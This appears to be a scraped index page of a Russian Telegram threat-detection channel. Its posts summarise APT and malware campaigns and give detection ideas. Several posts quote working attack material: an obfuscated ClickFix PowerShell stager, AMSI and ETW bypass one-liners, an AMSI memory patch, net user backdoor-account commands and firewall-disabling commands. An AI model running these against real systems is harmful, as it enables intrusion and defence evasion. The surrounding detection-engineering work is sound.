tgindex

Detection is easy

описание

chat: https://t.me/+BF4T6DOGv_UwYTBi contact: @siemmanager email: manager@detectioneasy.ru

1 276
подписчиков
Охват к подписчикам
70,9%
ERR
Реакции к просмотрам
1,66%
753 на 50 постов
Пересылки к просмотрам
1,56%
706
Постов в день
0,0
всего 101

Где отзываются чаще

доля реакций к просмотрам
  • 23 февр.без подписи5,49%
  • 16 февр.Всем привет! 💻✌️ После месячной раскачки — возвращаемся к практике Начнем с отчета о действиях группировки APT-Q-27 ❗️Атакующие используют непривычные расширения exe или scr, а расширение pif У большинства жертв в Windows скрыто отображение расширений файлов. В результате Проводник показывает только имя файла, и pif выглядит менее подозрительно 👨‍💻 Как это работает? 🔤 Пользователь получает ссылку на файл вида hxxps://storage[.]googleapis[.]com/iwantuu/photo202512.pif#image2025-12-29-14-53.jpg Для отвода внимания жертвы в конце URL установлен идентификатор фрагмента #image2025-12-29-14-53.jpg 🔤 По ссылке загружается дропер с расширением .pif 🔤 После запуска он получает список адресов для загрузки остальных шагов из файла hxxps://yyupdats[.]s3.ap-southeast-1.amazonaws.com/updat.txt 🔤 Далее TTP мимикрируют под процесс обновления Windows Файлы сохраняются в каталог C:\Users\Admin\AppData\Local\\Microsoft\WindowsUpdate\\Cache\WU_20251230_67e65f7b@27 и ему устанавливаются атрибуты Hidden и NotContentIndexed Используется файл updat.exe - (64B07B1C385CF94A3559E323009F7641) легитимный файл, который нужен для детонации полезной нагрузки из crashreport.dll 🔤Вредонос закрепляется в ключе HKCU\Software\Microsoft\Windows\CurrentVersion\Run текущего пользователя 🔤Далее происходит распаковка backdoor из файла, который создает службу с именем Windows EventN. Путь к запускаемому файлу C:\\Users\\<User>\\Videos\\<random_string>@27 🔤Отключается UAC, путем изменения ключей реестра HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\{EnableLUA, ConsentPromptBehaviorAdmin, PromptOnSecureDesktop} 🔭 Обнаружение: 🔤 отслеживаем создание файлов и создание процессов с расширением pif 🔤 хантим наличие директорий с @ в имени 🔤 хантим наличие директорий с атрибутом Hidden и/или NotContentIndexed 🔤 отслеживаем и хантим наличие служб с исполняемым файлом в пользовательских директориях 🔤 отслеживаем и хантим изменение ключей реестра UAC #detection@detectioneasy #ttp@detectioneasy3,76%
  • 12 февр.#Infographics #Blue_Team_Techniques "Detection Engineering Cheatsheet", SANS 2026. // This poster provides a practical, end-to-end view of Detection Engineering, guiding defenders from raw log data to meaningful alerts3,59%
  • 22 февр.Всем привет 💻✌️ Разбирем PhantomProxyLite группы Head Mare, по исследованию ЛК 👨‍💻 Как это работает? 🔤 в ранних кампаниях PhantomProxyLite был бинарником, который работал как фоновый сервис с именем SSHService и поднимал обратный SSH-туннель к C2 🔤 в новой кампании инструмент переписали на PowerShell: закрепление теперь делается через задачу Планировщика с тем же именем SSHService, запуск при старте системы от имени SYSTEM 🔤 функционал закрепления - создание SSH-туннеля. Параметры для запуска хранятся в ключе HKLM\SOFTWARE\SSHService ❗️В исследовании не уточняется, какой сервис прокидывали через SSH-туннель, поэтому в качестве наиболее вероятного сценария будем рассматривать RDP 🔭 Обнаружение: 🔤 создание задачи и службы с именем SSHService. Можем похантить задачи с powershell 🔤 исходящие сессии (sysmon 3, security 5156) на порт 22. При наличии IDS,NTA исходящие ssh соединения 🔤 отслеживаем запуск нативного ssh клиента C:\Windows\System32\OpenSSH\ssh.exe 🔤 RDP-сесиию из туннеля мы можем увидеть в логах Microsoft-Windows-TerminalServices-LocalSessionManager/Operational AND EventId=24 AND Address contains ::%16777216 а также Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin AND EventId=1158 AND Param1=::%16777216 🔤 аномалией может стать Security AND EventID=5156 AND SourceAddress contains ::1 and DestAddress contains ::1 and DestPort=3389 #detection@detectioneasy #ttp@detectioneasy3,27%
  • 26 февр.Всем привет 💻✌️ Elastic Security Labs разобрали кампанию ClickFix, которая заканчивается установкой кастомного RAT MIMICRAT По цепочке видно высокий уровень OPSEC: компрометация легитимных сайтов как инфраструктуры доставки, многоступенчатый PowerShell, затем bypass ETW + AMSI, после чего дропается Lua-лоадер, исполняющий шеллкод в памяти 👨‍💻 Как это работает? 🔤 доставка осуществляется через ClickFix, в результате которого выполняется обфусцированный Stage 1 — PowerShell-скрипт powershell.exe -WInDo Min $RdLU='aZmEwGEtHPckKyBXPxMRi.neTwOrkicsGf';$OnRa=($RdLU.Substring(17,12));$jOFn=.($RdLU[(87)/(3)]+$RdLU[19]+$RdLU[2]) $OnRa;$TNNt=$jOFn; .($TNNt.Remove(0,3).Remove(3))($TNNt); 🔤 Stage 2 - загруженный скрипт обфусцирован арифметическими операциями $smaau = (-join[char[]](((7454404997-7439813680)/175799),(91873122/759282),...)) 🔤 ETW Bypass путем изменения .NET класса [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) 🔤 AMSI Bypass [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) 🔤 AMSI - Memory Patching. После отключения обнаружения в %ProgramData%/knz_{random} дропнут архив с Lua loader $ScanContent_func = [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetMethods("NonPublic,Static") | Where-Object Name -eq "ScanContent" $tttttttttt = [zsZRXVIIMQvZ].GetMethods() | Where-Object Name -eq "FHVcGSwOEM" [System.Runtime.InteropServices.Marshal]::Copy( @([System.Runtime.InteropServices.Marshal]::ReadIntPtr([long]$tttttttttt.MethodHandle.Value + [long]8)), 0, [long]$ScanContent_func.MethodHandle.Value + [long]8, 1 ) 🔤 доставка Lua loader $extractTo = Join-Path $env:ProgramData ("knz_{0}" -f ([IO.Path]::GetRandomFileName())) [IO.Compression.ZipFile]::ExtractToDirectory($tempZip, $extractTo) Start-Process (Join-Path $extractTo 'zbuild.exe') 🔭 Обнаружение: 🔤 запуск PowerShell в минимальном режиме powershell.exe -WInDo Min 🔤 отслеживание длинных символьных последовательностей в логах PowerShell 🔤 в логах PowerShell Reflection.Assembly, System.Diagnostics.Eventing.EventProvider, PSEtwLogProvider, System.Management.Automation.AmsiUtils, GetRandomFileName, IO.Compression.ZipFile, -join [char[]] 🔤 создание файлов exe,zip в %ProgramData% p.s. детекты от elastic: Execution via Obfuscated PowerShell Script DNS Query to Suspicious Top Level Domain Suspicious Command Shell Execution via Windows Run Token theft and impersonation Potential Privilege Escalation via Token Impersonation Shellcode Execution from Low Reputation Module #detection@detectioneasy #ttp@detectioneasy3,10%
  • 17 февр.Всем привет! 💻✌️ Cisco Talos опубликовали отчет о TTP группировки UAT-8099 👨‍💻 Как это работает? 🔤 После получения доступа выполняют команды для анализа хоста - whoami, tasklist 🔤 Для закрепления устанавливают SoftEther VPN и создают учетную запись, маскирующуюся под сервисную, mssql$ (в дальнейшем логин менялся, однако IOA оставался тем же) cmd /c net user mssql$ AppleHuitar7$ /add cmd /c net localgroup administrators mssql$ /add cmd /c net user mssql$ /expires:never 🔤 Один из инструментов атакующих - GotoHTTP Загружают через PowerShell Invoke-WebRequest https://.*/*.vbs и запускают cmd /c C:\Users\Public\zcgo1.vbs 🔤 Конечная цель атакующих — внедрение кода в IIS 🔭 Обнаружение: 🔤 отслеживаем запуск whoami и net user|localgroup 🔤 хантим и отслеживаем создание пользовательских учетных записей с последним символом $ 🔤 отслеживаем EventId=4624 and LogonType in [3, 10] and TargetUserName endswith $ 🔤 мониторим использование RMM Tool 🔤 отслеживаем запуск дочерних процессов (cmd.exe, powershell.exe, etc) от родителя w3wp.exe 🔤 отслеживаем создание новых *.aspx 🔤 создание странных файлов в C:\Users\Public #detection@detectioneasy #ttp@detectioneasy3,00%
  • 19 февр.Всем привет 💻✌️ Коллеги PT ESC раскрыли техники, используемые для распространения LuciDoor и MarsSnake. 👨‍💻 Как это работает? 🔤 как правило, атака начинается с фишинга, в рамках которого доставляется файл .doc с макросом. Содержимое документа побуждает пользователя нажать Включить содержимое 🔤 закреп через задачу. Путь к сохраняемому бинарному файлу зависит от прав пользователя обычный пользователь — %AppData% администратор — %ProgramData%\Microsoft OneDrive\setup\ 🔤 используемые злоумышленниками библиотеки маскируются под легитимные файлы Windows (заполняются поля описания и метаданные) 🔤 использование утилиты ftp для запуска команд - FTPlnk_phishing 🔭 Обнаружение: 🔤 мониторинг запуска ftp.exe -::s: и анализ дочерних процессов ftp.exe 🔤 поиск файлов с описанием, содержащим Windows или Microsoft, и отсутствующей/невалидной подписью #detection@detectioneasy #ttp@detectioneasy2,97%
  • 29 июл.Всем привет 💻✌️ При проведении compromise assessment на Windows-машине в WORKGROUP сразу бросилась в глаза служба NSSM (Non-Sucking Service Manager). Она позволяет запускать приложения, как Windows-службы. Путь службы вел к %SystemDrive%\Programm Data\ Оказалось, что это был DLP-агент, собранный через PyInstaller, а для запуска бинарника разработчики использовали NSSM 🤣 Права на директорию, файлы и службу были настроены некорректно. В результате конфигурация создавала возможность для подмены исполняемого файла и повышения привилегий на хосте. p.s. вайбкодер бы такого не сделал 🔎 #detection@detectioneasy #ttp@detectioneasy2,87%
  • 28 февр.Всем привет 💻✌️ Коллеги из ЛК подсветили изменения в TTP Librarian Likho 👨‍💻 Как это работает? 🔤 Атакующие не утруждаются и фишат исполняемыми файлами *.com, что может говорить об отсутствии защиты почты у их жертв... 🔤 Исполняемый файл - это инсталлятор собранный через Smart Install Maker 🔤 После запуска создаются два cab-архива, мимикрирующие под временные файлы - 2.tmp и temp_0.tmp, по пути Users\[REDACTED]\AppData\Local\Temp\$inst 🔤 Из их архивов извлекаются файлы - приманка, текстовый файл со списком адресов, curl и два bat-скрипта 🔤 Далее, запускается decoy-файл и скрипт find.cmd 🔤 Скрипт получает список C2-серверов и загружает архивы и кастомную версию WinRAR с захардкоженным паролем. После чего, распаковывает архивы в Users\[REDACTED]\AppData\Roaming\Windows. Файлы из архивов: blat.exe - Утилита для эксфильтрации данных через SMTP AnyDesk.exe - Утилита для удаленного управления хостом Trays.exe - Утилита для сокрытия окон запущенных процессов wbpv.exe - Утилита WebBrowserPassView для восстановления паролей, сохраненных в веб-браузерах dc.exe - Утилита для отключения Windows Defender mlpv.exe - Утилита для восстановления паролей с почтовых клиентов bat.bat - Скрипт для эксфильтрации паролей и обхода средств защиты информации 🔤 Механизмы защиты отключаются остановкой или удалением служб WinDefend и MpsSvc, и профилей брандмауэра netsh advfirewall set allprofiles state off 🔤 Для закрепления используется служба AnyDesk echo qqqq | AnyDesk.exe —set-password _unattended_access 🔤Завершающий этап - это сбор паролей из браузеров, почтовых клиентов и их эксфильтрация 🔭 Обнаружение: 🔤 отслеживаем создание исполняемых файлов браузерами и почтовыми клиентами 🔤 отслеживаем родительскую цепочку для офисных процессов, обычно это explorer.exe, outlook.exe, chrome, firefox.exe, browser.exe и другие, нужно профилировать или родительский исполняемый файл из Temp, Downloads 🔤 отслеживаем smtp трафик с пользовательских хостов, на сторонние сервера 🔤 отслеживаем остановку служб средств защиты #detection@detectioneasy #ttp@detectioneasy2,57%
  • 18 февр.Всем привет! 💻✌️ ClickFix уже многим успел надоесть, однако атакующие продолжают активно продвигать этот метод Кто-то ещё не заблокировал запуск окна Выполнить ⌨️ 👨‍💻 Как это работает? Атакующие резолвят определенный домен через подконтрольные DNS сервера. Ответ сервера парсится и передается на выполнение LOLBins 🔭 Обнаружение: 🔤 отключаем Выполнить 🔤 хантим RunMRU и мониторим создание новых ключей 🔤 разрешаем подключение только к доверенным DNS-серверам 🔤 хантим DNS-ответы #detection@detectioneasy #ttp@detectioneasy2,54%
  • 16 окт. 2025 г.Всем привет! 💻✌️ У многих на слуху DFIR/TH инструмент Velociraptor 🦖. Он позволяет централизованно собирать артефакты, события из журналов и много чего еще, а также выполнять команды Приложение является клиент-сервером, клиенты устанавливаются в роли службы с правами root или system Виндовый клиент еще подписан - rapid7 Сложилось все, чтобы Velociraptor попал в категорию RMM (Remote monitoring and management) и стал использоваться хакерами в атаках Solar упоминали об этом еще в 2024 году Rapid7 дали рекомендации по обнаружению 🔭 Обнаружение: 🔤 по метаинформации файла Description: Velociraptor: Digging Deeper! Product: Velociraptor Company: Rapid 7 Inc OriginalFileName: Velociraptor.exe 🔤 при первом запуске создается ключ в реестре HKLM\System\CurrentControlSet\Services\EventLog\Application\Velociraptor 🔤 отслеживаем аргументы -ExecutionPolicy Unrestricted -encodedCommand команды выполняются в следующем виде, если артефакт powershell и команда dir C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -encodedCommand ZABpAHIA для cmd cmd.exe /c dir 🔤 Rapid7 предложило Sigma-правило, в котором отслеживаются аргументы командой строки selection_velociraptor: Image|endswith: '\Velociraptor.exe' selection_suspicious_args: CommandLine|contains: - "--config" - "client.config.yaml" - "service run" selection_unsigned: Signature|endswith: - "Unsigned" condition: selection_velociraptor and (selection_suspicious_args or selection_unsigned) 🔤 также во время работы создаются два файла с расширениями yaml и yaml.bak #detection@detectioneasy #ttp@detectioneasy2,53%
  • 12 мар.Всем привет 💻✌️ Группа APT-36 собирает необычные .lnk файлы размером более 2 MB, которые содержат PDF-структуры Анализ показал, что злоумышленники встраивают объекты stream, endobj, изображения и другие структуры PDF. Это делает файл похожим на настоящий документ и увеличивает его размер 🔭 Обнаружение: 🔤 хантим LNK файлы с большим объемом (обычный вес 10–12 KB) rule Suspicious_LNK_Large_File { meta: description = "Detect unusually large Windows shortcut files >200KB" author = "@detectioneasy" date = "2026-03-12" reference = "Malware often abuses oversized LNK files to embed payloads https://www.cyfirma.com/research/apt36-multi-stage-lnk-malware-campaign-targeting-indian-government-entities/" strings: $lnk_magic = {4C 00 00 00 01 14 02 00} condition: $lnk_magic at 0 and filesize > 200KB } 🔤 отслеживаем создание LNK файлов, процессами архиваторов 🔤 отслеживаем LNK-файлы с альтернативным потоком #detection@detectioneasy #ttp@detectioneasy2,18%